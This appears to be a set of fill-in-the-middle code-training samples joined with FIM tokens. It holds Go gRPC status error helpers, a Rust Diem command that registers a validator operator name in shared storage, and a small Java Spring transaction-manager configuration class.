func (s *Status) Details() []interface{} {
if s == nil || s.s == nil {
return nil
}
details := make([]interface{}, 0, len(s.s.Details))
for _, any := range s.s.Details {
detail := &ptypes.DynamicAny{}
if err := ptypes.UnmarshalAny(any, detail); err != nil {
details = append(details, err)
continue
}
details = append(details, detail.Message)
}
return details
}
// Code returns the Code of the error if it is a Status error, codes.OK if err
// is nil, or codes.Unknown otherwise.
func Code(err error) codes.Code {
// Don't use FromError to avoid allocation of OK status.
if err == nil {
return codes.OK
}
if se, ok := err.(interface {
GRPCStatus() *Status
}); ok {
return se.GRPCStatus().Code()
}
return codes.Unknown
}
// FromContextError converts a context error into a Status. It returns a
// Status with codes.OK if err is nil, or a Status with codes.Unknown if err is
// non-nil and not a context error.
func FromContextError(err error) *Status {
switch err {
case nil:
return New(codes.OK, "")
case context.DeadlineExceeded:
return New(codes.DeadlineExceeded, err.Error())
case context.Canceled:
return New(codes.Canceled, err.Error())
default:
return New(codes.Unknown, err.Error())
}
}<|fim▁end|> | "errors"
"fmt" |
<|file_name|>validator_operator.rs<|end_file_name|><|fim▁begin|>// Copyright (c) The Diem Core Contributors
// SPDX-License-Identifier: Apache-2.0
use diem_global_constants::OPERATOR_KEY;
use diem_management::{config::ConfigPath, constants, error::Error, secure_backend::SharedBackend};
use structopt::StructOpt;
#[derive(Debug, StructOpt)]
pub struct ValidatorOperator {
#[structopt(flatten)]
config: ConfigPath,
#[structopt(long)]
operator_name: String,
#[structopt(flatten)]
shared_backend: SharedBackend,<|fim▁hole|> let config = self
.config
.load()?
.override_shared_backend(&self.shared_backend.shared_backend)?;
let operator_name = self.operator_name;
// Verify the operator exists in the shared storage
let operator_storage = config.shared_backend_with_namespace(operator_name.clone());
let _ = operator_storage.ed25519_key(OPERATOR_KEY)?;
// Upload the operator name to shared storage
let mut shared_storage = config.shared_backend();
shared_storage.set(constants::VALIDATOR_OPERATOR, operator_name.clone())?;
Ok(operator_name)
}
}<|fim▁end|> | }
impl ValidatorOperator {
pub fn execute(self) -> Result<String, Error> { |
<|file_name|>CommonDBConfiguration.java<|end_file_name|><|fim▁begin|>/**
* <pre>
* Project: cargo-itest Created on: 26 nov. 2014 File: fCommonDBConfiguration.java
* Package: nl.tranquilizedquality.itest.configuration
*
* Copyright (c) 2014 Tranquilized Quality www.tr-quality.com All rights
* reserved.
*
* This software is the confidential and proprietary information of Dizizid
* ("Confidential Information"). You shall not disclose such Confidential
* Information and shall use it only in accordance with the terms of the license
* agreement you entered into with Tranquilized Quality.
* </pre>
*/
package nl.tranquilizedquality.itest.configuration;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.jdbc.datasource.DataSourceTransactionManager;
import org.springframework.jdbc.datasource.SingleConnectionDataSource;
/**
* @author Salomo Petrus ([email protected])
* @since 26 nov. 2014
*
*/
@Configuration
public class CommonDBConfiguration extends DatasourceConfiguration {
@Bean(name = "transactionManager")
public DataSourceTransactionManager dataSourceTransactionManager(final SingleConnectionDataSource dataSource) {
<|fim▁hole|> return new DataSourceTransactionManager(dataSource);
}
}<|fim▁end|> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.